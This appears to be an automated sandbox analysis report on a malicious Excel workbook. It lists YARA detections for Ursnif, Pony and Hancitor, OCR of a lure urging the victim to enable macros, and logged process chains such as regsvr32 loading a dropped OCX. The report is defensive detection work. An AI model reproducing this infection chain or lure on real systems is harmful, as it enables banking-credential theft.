Source: Yara match | File source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
Source: BN6D10.tmp, 0000000D.00000002.705427682.0000000000F5A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
Yara detected Pony
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hancitor Payload, Author: kevoreilly
Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hancitor Payload, Author: kevoreilly
Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 6.2.svchost.exe.2440000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload, Author: kevoreilly
Source: 5.2.regsvr32.exe.46c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload, Author: kevoreilly
Source: 13.2.BN6D10.tmp.ef0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Ursnif (a.k.a. Dreambot, Gozi, ISFB) in memory, Author: JPCERT/CC Incident Response Group
Source: 6.2.svchost.exe.2440000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload, Author: kevoreilly
Source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identify Pony, Author: Brian Wallace @botnet_hunter
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Screenshot number: 12 | Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
Source: Screenshot number: 12 | Screenshot OCR: Enable content button from the yellow bar above J K L I M I N I O I P I Q I R I S I " O
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 | Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1 | Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
Source: Document image extraction number: 1 | Screenshot OCR: Enable content button from the yellow bar above
Found abnormal large hidden Excel 4.0 Macro sheet
Source: tr_0.xls | Initial sample: Sheet size: 14850327
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Documents\dDdoiBj.ocx
Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00401900 GetProcAddress,NtCreateSection,memset
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00401AF0 NtMapViewOfSection
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B01D9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000301A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000D46A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC0341E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 10001D2A appears 55 times
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
Source: BN6D10.tmp.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BN6D10.tmp.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
Source: tr_0.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 6.2.svchost.exe.2440000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 5.2.regsvr32.exe.46c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 13.2.BN6D10.tmp.ef0000.1.unpack, type: UNPACKEDPE | Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.svchost.exe.2440000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: classification engine | Classification label: mal100.bank.troj.spyw.expl.evad.winXLS@19/52@10/5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10002941 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC09B51 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000AF31 CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,FindCloseChangeNotification,CreateMutexA,CreateProcessA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10007FE8 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\mtxLogMeInIgnition.IgnitionMutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{DC128E87-8D5A-4163-A531-30831ABEA591} - OProcSessId.dat
Source: tr_0.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts (this entry is listed 8 times in the report)
Source: tr_0.xls | Virustotal: Detection: 20%
Source: tr_0.xls | ReversingLabs: Detection: 16%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx
Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /K
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\BN6D10.tmp C:\Users\user\AppData\Local\Temp\BN6D10.tmp
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /K
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\BN6D10.tmp C:\Users\user\AppData\Local\Temp\BN6D10.tmp
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.455787044.0000000000C77000.00000004.00000001.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbXuO source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.455841441.0000000000C7D000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.475049315.0000000000712000.00000004.00000010.sdmp
          Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: comdlg32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.455841441.0000000000C7D000.00000004.00000001.sdmp
